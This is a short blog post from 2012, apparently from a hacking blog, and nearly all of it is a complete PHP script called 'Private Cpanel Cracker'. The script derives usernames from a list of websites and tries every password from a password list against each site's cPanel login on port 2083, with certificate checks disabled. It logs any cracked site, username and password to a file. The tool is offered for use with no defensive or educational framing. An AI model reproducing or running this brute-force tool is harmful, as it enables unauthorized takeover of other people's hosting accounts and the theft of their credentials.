Sunday 3 June 2012

Private Cpanel Cracker (Web hacking) 

<?php
set_time_limit(0);

/********************************************************************
* Private Cpanel Cracker
* Coded by Miyachung
* miyachung@hotmail.com
* Janissaries.Org
* Demonstration -> http://www.youtube.com/watch?v=mLkudfIAPgA
*********************************************************************/

class cracker
{

 public  $sitelist;
 public  $passlist;
 
 public function calis()
 {
   $usernames   =  $this->make_username();
   $sitelist  = explode("\n",$this->openfile($this->sitelist)); 
   $passlist  = explode("\n",$this->openfile($this->passlist));
   $increment = 0;
   
   echo "\n\n[*]Site list -> $this->sitelist\n";
   echo "[*]Pass list -> $this->passlist\n";
   echo "[*]Total urls -> ".count($sitelist)."\n";
   echo "[*]Total pass -> ".count($passlist)."\n";
   echo "[*]Cracking started\n\n";
   
   foreach($sitelist as $id => $site)
   {
   $increment++;
   $site = trim($site);
   echo "-------------------------------------------------------\n";
   echo "[*]Trying site: ".$site." $increment / ".count($sitelist)."\n";
   if(eregi('http',$site)){
   $site = str_replace("http://","https://",$site);
   }else{ 
   $site = "https://$site";
   }
   $site= $site.":2083";
   
   if(!$this->pass_site($site))
   {
   echo "[-]Not cpanel,passing site\n";
   echo "-------------------------------------------------------\n\n";
   continue;
   }

   echo "[*]Connected Cpanel [OK]\n";
   echo "[*]Username: ".$usernames[$id]."\n";
   echo "[*]Loaded ".count($passlist)." passwords\n";
   echo "[*]Coded by Miyachung ||| Janissaries.Org\n";
    foreach($passlist as $pass)
    {
     $cracked = false;
     
     $pass=trim($pass);
     
     $result = $this->post($site,$usernames[$id],$pass);
     
     if(preg_match('/security_token/',$result))
     {
     $cracked = true;
     echo "[+]$pass password cracked for $usernames[$id]\n";
     echo "-------------------------------------------------------\n\n";
     $this->savefile("$site|$usernames[$id]|$pass");
     break;
     }
     
    }
   if(!$cracked){echo "[-]Not found\n";echo "-----------------------------------\n\n";}
   }
 
 }
 
 private function make_username()
 {
   $op = explode("\n",$this->openfile($this->sitelist));
   foreach($op as $site)
   {
   
   if(eregi('http://',$site)) $site  = str_replace("http://","",$site);
   if(!eregi('www',$site))    $site  = "www.".$site;
   
   $site = explode(".",$site);
   $site = str_replace("-","",$site[1]);
   
   $usernames[] = substr($site,0,8);
   
   }
   return $usernames;
 }
 
 public function lists()
 {
   echo "[!]Site list: ";
   $sitelist = fgets(STDIN);
   $sitelist = str_replace("\r\n","",$sitelist);
   $sitelist = trim($sitelist);
   echo "[!]Pass list: ";
   $passlist = fgets(STDIN);
   $passlist = str_replace("\r\n","",$passlist);
   $passlist = trim($passlist);
   
   return array($sitelist,$passlist);
 }
 
 private function post($site,$user,$pass)
 {
   $curl = curl_init();
   curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
   curl_setopt($curl,CURLOPT_URL,$site."/login/?login_only=1");
   curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);
   curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);
   curl_setopt($curl,CURLOPT_TIMEOUT,7);
   curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
   curl_setopt($curl,CURLOPT_POST,1);
   curl_setopt($curl,CURLOPT_POSTFIELDS,"user=$user&pass=$pass");
   $exec = curl_exec($curl);
   return $exec;
 }
 
 private function pass_site($site)
 {
   $curl = curl_init();
   curl_setopt($curl,CURLOPT_RETURNTRANSFER,true);
   curl_setopt($curl,CURLOPT_URL,$site);
   curl_setopt($curl,CURLOPT_SSL_VERIFYHOST,0);
   curl_setopt($curl,CURLOPT_SSL_VERIFYPEER,0);
   curl_setopt($curl,CURLOPT_FOLLOWLOCATION,true);
   curl_setopt($curl,CURLOPT_TIMEOUT,7);
   $exec = curl_exec($curl);
   $info = curl_getinfo($curl);
   
   if($info['http_code'] != 0)
   {
   return true;
   }
   else
   {
   return false;
   }
 
 }
 
 private function openfile($file)
 {
   $file = @file_get_contents($file);
   if(!$file) exit("WTF File not found ?");
   return $file;
 }
 
 private function savefile($content)
 {
   $file = fopen('crackerlog.txt','ab');
   fwrite($file,$content."\r\n");
   fclose($file);
   return $file;
 }

}

$class      =   new cracker();
$lists      =   $class->lists();

   if(empty($lists[0]) || empty($lists[1])) exit("WTF Empty ? "); 
   
$class->sitelist   =   $lists[0];
$class->passlist   =   $lists[1];
$class->calis();


?>
Posted by at
Labels:

No comments:

Post a Comment

Note: only a member of this blog may post a comment.

Subscribe to: Post Comments (Atom)